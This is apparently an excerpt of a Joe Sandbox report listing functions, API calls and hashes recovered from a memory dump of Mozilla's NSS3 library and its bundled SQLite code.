                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: sqlite3_log
                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                      • API String ID: 632333372-598938438
                                                                                                                                                                                                                                                      • Opcode ID: a57f99850d5ee161323fad6a601f788b87cc56d49023785b80d75a667b4620e6
                                                                                                                                                                                                                                                      • Instruction ID: 98b64c19365427c2bf04059f64183717dc07b67c87857371dd6b0e827477b3fe
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a57f99850d5ee161323fad6a601f788b87cc56d49023785b80d75a667b4620e6
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9321DE707443059BD710CF1AD841F9AB7E2AF84308F148A2DDC5A9BB51E371E98ACB92
                                                                                                                                                                                                                                                      Function 6C4E2FD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_ArenaMark_Util.NSS3(?,-000000D4,00000000,?,<+Nl,6C4E32C2,<+Nl,00000000,00000000,?), ref: 6C4E2FDA
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: TlsGetValue.KERNEL32 ref: 6C4D14E0
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: EnterCriticalSection.KERNEL32 ref: 6C4D14F5
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: PR_Unlock.NSS3 ref: 6C4D150D
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,-00000007), ref: 6C4E300B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                                                      • SECOID_FindOIDByTag_Util.NSS3(00000010), ref: 6C4E302A
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D08B4
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BC3D0: PK11_ImportPublicKey.NSS3(?,?,00000000), ref: 6C4BC45D
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BC3D0: TlsGetValue.KERNEL32 ref: 6C4BC494
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BC3D0: EnterCriticalSection.KERNEL32(?), ref: 6C4BC4A9
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BC3D0: PR_Unlock.NSS3(?), ref: 6C4BC4F4
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Value$ArenaCriticalEnterSectionUnlockUtil$Alloc_AllocateErrorFindImportK11_Mark_PublicTag_
                                                                                                                                                                                                                                                      • String ID: <+Nl
                                                                                                                                                                                                                                                      • API String ID: 2538134263-2237628156
                                                                                                                                                                                                                                                      • Opcode ID: 595581cd8a3e58213a728435827faa4a7978b5385ddb469e9c4028bda8901334
                                                                                                                                                                                                                                                      • Instruction ID: c287604cf340fe1ea6c0460f3ccbc1df82e26030b2e104b932eb8692938b116a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 595581cd8a3e58213a728435827faa4a7978b5385ddb469e9c4028bda8901334
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0311C4B6A001046BDB00DE64DC00F9B77AA9B85279F1A8138EC1CD7790E772E915C7E1
                                                                                                                                                                                                                                                      Function 6C53CC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 6C53CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C53CC7B), ref: 6C53CD7A
                                                                                                                                                                                                                                                        • Part of subcall function 6C53CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C53CD8E
                                                                                                                                                                                                                                                        • Part of subcall function 6C53CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C53CDA5
                                                                                                                                                                                                                                                        • Part of subcall function 6C53CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C53CDB8
                                                                                                                                                                                                                                                      • PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6C53CCB5
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(6C5D14F4,6C5D02AC,00000090), ref: 6C53CCD3
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(6C5D1588,6C5D02AC,00000090), ref: 6C53CD2B
                                                                                                                                                                                                                                                        • Part of subcall function 6C459AC0: socket.WSOCK32(?,00000017,6C4599BE), ref: 6C459AE6
                                                                                                                                                                                                                                                        • Part of subcall function 6C459AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6C4599BE), ref: 6C459AFC
                                                                                                                                                                                                                                                        • Part of subcall function 6C460590: closesocket.WSOCK32(6C459A8F,?,?,6C459A8F,00000000), ref: 6C460597
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
                                                                                                                                                                                                                                                      • String ID: Ipv6_to_Ipv4 layer
                                                                                                                                                                                                                                                      • API String ID: 1231378898-412307543
                                                                                                                                                                                                                                                      • Opcode ID: ac2b3202054891969072743bb4959f1abcd13bab9cf48b95bd193201cc593f13
                                                                                                                                                                                                                                                      • Instruction ID: 8c8b29e72057abea4f5a9f5cdbc56e4fab84a335fadff71d1693fb485923b6ef
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ac2b3202054891969072743bb4959f1abcd13bab9cf48b95bd193201cc593f13
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AD1160F5B223609EEB009F599C06B433AF89396628F161129E41ACBB42E775F4044FDE
                                                                                                                                                                                                                                                      Function 6C488850 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • calloc.MOZGLUE(00000001,00000028,00000000,?,?,6C490715), ref: 6C488859
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3 ref: 6C488874
                                                                                                                                                                                                                                                        • Part of subcall function 6C5398D0: calloc.MOZGLUE(00000001,00000084,6C460936,00000001,?,6C46102C), ref: 6C5398E5
                                                                                                                                                                                                                                                      • PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6C48888D
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: calloc$ArenaInitLockPool
                                                                                                                                                                                                                                                      • String ID: NSS
                                                                                                                                                                                                                                                      • API String ID: 2230817933-3870390017
                                                                                                                                                                                                                                                      • Opcode ID: 4224ba73fd64e82cc36a6b0b616ff129ce42623541326b54f46f93a21e3f45af
                                                                                                                                                                                                                                                      • Instruction ID: 83ae5b79a9eeee0ba2137285c0c493b6a77a46551982ed91300c40fcd75f5841
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4224ba73fd64e82cc36a6b0b616ff129ce42623541326b54f46f93a21e3f45af
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1F0F662E4362033F210A2696C06F8775989F9275EF040035E90CA3B82EB52E50883E3
                                                                                                                                                                                                                                                      Function 6C53B860 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 41COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000116BB,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,6C52A4E2), ref: 6C53B8C6
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C53B8B0
                                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6C53B8BF
                                                                                                                                                                                                                                                      • database corruption, xrefs: 6C53B8BA
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: sqlite3_log
                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                      • API String ID: 632333372-598938438
                                                                                                                                                                                                                                                      • Opcode ID: f7e665d45c6a4c34ff1ba07b0e9efe87daecec31c564059afcd5b94db99f4fe2
                                                                                                                                                                                                                                                      • Instruction ID: 0fc32b8c75f50bf91a1e4708d79bcce523934fbd6ac58943a71718733ed659d0
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f7e665d45c6a4c34ff1ba07b0e9efe87daecec31c564059afcd5b94db99f4fe2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F0149329481A0A9D310DB7A5C94D937FBC9F8531570B01C9FA446F3B3E212C802C3E1
                                                                                                                                                                                                                                                      Function 6C407F90 Relevance: 6.2, APIs: 4, Instructions: 223COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C4081DF
                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 6C408239
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C408255
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(00000000), ref: 6C408260
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeavememcpysqlite3_free
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1525636458-0
                                                                                                                                                                                                                                                      • Opcode ID: 60b6e31b6c6986ed9c6c7015aaaee0fda872f99f5e3f7c1808f213273373ed10
                                                                                                                                                                                                                                                      • Instruction ID: 5aedd396dadee67c696c436e6268cbec7b1e1be259a2ae1a181577f3814397ba
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 60b6e31b6c6986ed9c6c7015aaaee0fda872f99f5e3f7c1808f213273373ed10
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F5919B71B816088BEB04DFE0DE49FADB7B1BF06305F16403ED416AB640DB396945CB8A
                                                                                                                                                                                                                                                      Function 6C4E1D60 Relevance: 6.1, APIs: 4, Instructions: 141memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_ArenaMark_Util.NSS3(?), ref: 6C4E1D8F
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: TlsGetValue.KERNEL32 ref: 6C4D14E0
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: EnterCriticalSection.KERNEL32 ref: 6C4D14F5
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: PR_Unlock.NSS3 ref: 6C4D150D
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C4E1DA6
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                                                      • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C4E1E13
                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C4E1ED0
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ArenaUtil$Value$CriticalEnterSectionUnlock$Alloc_AllocateArena_FreeItem_Mark_
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 84796498-0
                                                                                                                                                                                                                                                      • Opcode ID: f7223f3220f5b96438945335279ee27fe37ba1cc190a4f04edc4a7c5f879d44f
                                                                                                                                                                                                                                                      • Instruction ID: 231a26998dc301a4b09e16a835918b02cc32040d2ddb5e336be79b45d47258a6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f7223f3220f5b96438945335279ee27fe37ba1cc190a4f04edc4a7c5f879d44f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A514675A403098BDB00CF98C884FAEB7B6BF4931AF164129E81A9B752D731E945CB90
                                                                                                                                                                                                                                                      Function 6C534FF0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,00000000,?,?,00000001,?,6C4185D2,00000000,?,?), ref: 6C534FFD
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C53500C
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C5350C8
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C5350D6
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _byteswap_ulong
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4101233201-0
                                                                                                                                                                                                                                                      • Opcode ID: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
                                                                                                                                                                                                                                                      • Instruction ID: 21d229a5fe89ea2fb25f629b033f3a51f0d2a9ae5c76ea73118796a6f40ad817
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F6417DB6A012218BCB18CF18DCD179AB7E1BF4431871D5669D84ACBB02F379E891CB81
                                                                                                                                                                                                                                                      Function 6C45FFA0 Relevance: 6.1, APIs: 4, Instructions: 118COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • sqlite3_initialize.NSS3(00000000,?,?,?,6C45FDFE), ref: 6C45FFAD
                                                                                                                                                                                                                                                        • Part of subcall function 6C3FCA30: EnterCriticalSection.KERNEL32(?,?,?,6C45F9C9,?,6C45F4DA,6C45F9C9,?,?,6C42369A), ref: 6C3FCA7A
                                                                                                                                                                                                                                                        • Part of subcall function 6C3FCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C3FCB26
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000008,00000000,?,?,?,6C45FDFE), ref: 6C45FFDF
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,00000000,?,?,?,6C45FDFE), ref: 6C46001C
                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,6C45FDFE), ref: 6C46006F
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeave$memsetsqlite3_initialize
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2358433136-0
                                                                                                                                                                                                                                                      • Opcode ID: 63b188da15b7ada5db23269b4da4f025dc893a3581ee799a1cc4ae35154e34e6
                                                                                                                                                                                                                                                      • Instruction ID: 975cc34d86e1ceaa033ba463a0f9b0e150c8ed643f8244cb294b80f2ec1af549
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 63b188da15b7ada5db23269b4da4f025dc893a3581ee799a1cc4ae35154e34e6
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5541ED71B002158BDB08DFA5EC85EAEB7B0FB45315F05002DD806A7B01EB3AA941CBE9
                                                                                                                                                                                                                                                      Function 6C58A860 Relevance: 6.1, APIs: 4, Instructions: 111COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 6C58A690: calloc.MOZGLUE(00000001,00000044,?,?,?,?,6C58A662), ref: 6C58A69E
                                                                                                                                                                                                                                                        • Part of subcall function 6C58A690: PR_NewCondVar.NSS3(?), ref: 6C58A6B4
                                                                                                                                                                                                                                                      • PR_IntervalNow.NSS3 ref: 6C58A8C6
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C58A8EB
                                                                                                                                                                                                                                                      • _PR_MD_UNLOCK.NSS3(?), ref: 6C58A944
                                                                                                                                                                                                                                                      • PR_SetPollableEvent.NSS3(?), ref: 6C58A94F
